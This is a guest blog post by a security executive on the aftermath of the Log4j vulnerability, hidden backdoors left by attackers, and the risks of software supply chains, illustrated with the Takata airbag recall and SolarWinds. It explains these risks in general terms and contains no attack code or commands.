top of page

What’s Next After Log4j?

This guest post was contributed by Lou Steinberg, founder and Managing Partner of CTM Insights, a cybersecurity research lab and incubator with eight operating cyber companies. Prior to CTM, Steinberg served for 6 years as the CTO of TD Ameritrade where he was responsible for technology innovation, platform architecture, engineering, operations, risk management, and cybersecurity.

It's not over 'till it's over. And it's not over.

When the log4j vulnerability was first announced, there was a mad scramble. Millions of servers worldwide use log4j as part of their plumbing. At risk systems had to be found and patched before they could be exploited by attackers. And attack they did. Log4J created a relatively easy way to take control of systems with valuable data, so bad actors wrote tools to scan the internet looking for unpatched targets.

This is called a "zero-day", where defenders have zero days to prepare. Attackers and defenders engage: whomever finds a vulnerable system first wins it.

Here's the next problem: the race may be (largely) over, but only the attackers know the score. Smart attackers didn't stop to mine each system they compromised. They did just enough to put in backdoor accounts and access so they could come back later, then kept hunting for more systems to take over. Defenders could come in and patch the log4j vulnerability later, but that’s like locking your door with the burglar already inside. If the attackers were sloppy and left clues (the digital break-in equivalent of a smashed window and broken glass on the ground), we might find them later. If they were stealthy, we won’t. As a result, it’s hard to know how many systems are already compromised. It may months or even years until we know if most critical systems were patched in time.

And that's just log4j. Chances are good there's another zero day behind this, and another behind that. Why? Because modern software is assembled from lots of "components" that have one thing in common. Someone else wrote them. This is what's called a "software supply chain", where a finished product is build from suppliers' parts. If a commonly used part is defective, it can affect a lot of different products that incorporated it.

Remember the Takata airbag recall in 2014? Defective airbag components were put in 47 million cars made by 19 different automakers. One commonly included component affected many products. The same happens with software, but less randomly. We have attackers actively trying to insert malicious code into components so they can later exploit the finished products. A user installs software or an update from a trusted provider and unknowingly installs vulnerabilities and malware, as happened with Solarwinds.

Worse still, many of the included components are "black boxes"-- software providers have little ability to see what's inside. Imagine making a cake, but before you start someone has the option of secretly changing any of the ingredients you buy. Now imaging you are competing against them for a $1M best cake prize, so they have a incentive to want your cake to fail. That's how we make software. Sometimes we use a defective ingredient, and sometimes the ingredients have been tampered with. We try to keep the bad actors out of our kitchen, but can't be certain the components we use aren't compromised.

Complexity is the enemy of security, and dependencies create complexity. With motivated attackers and millions of components our applications and services are exposed so get ready because this will happen again.



bottom of page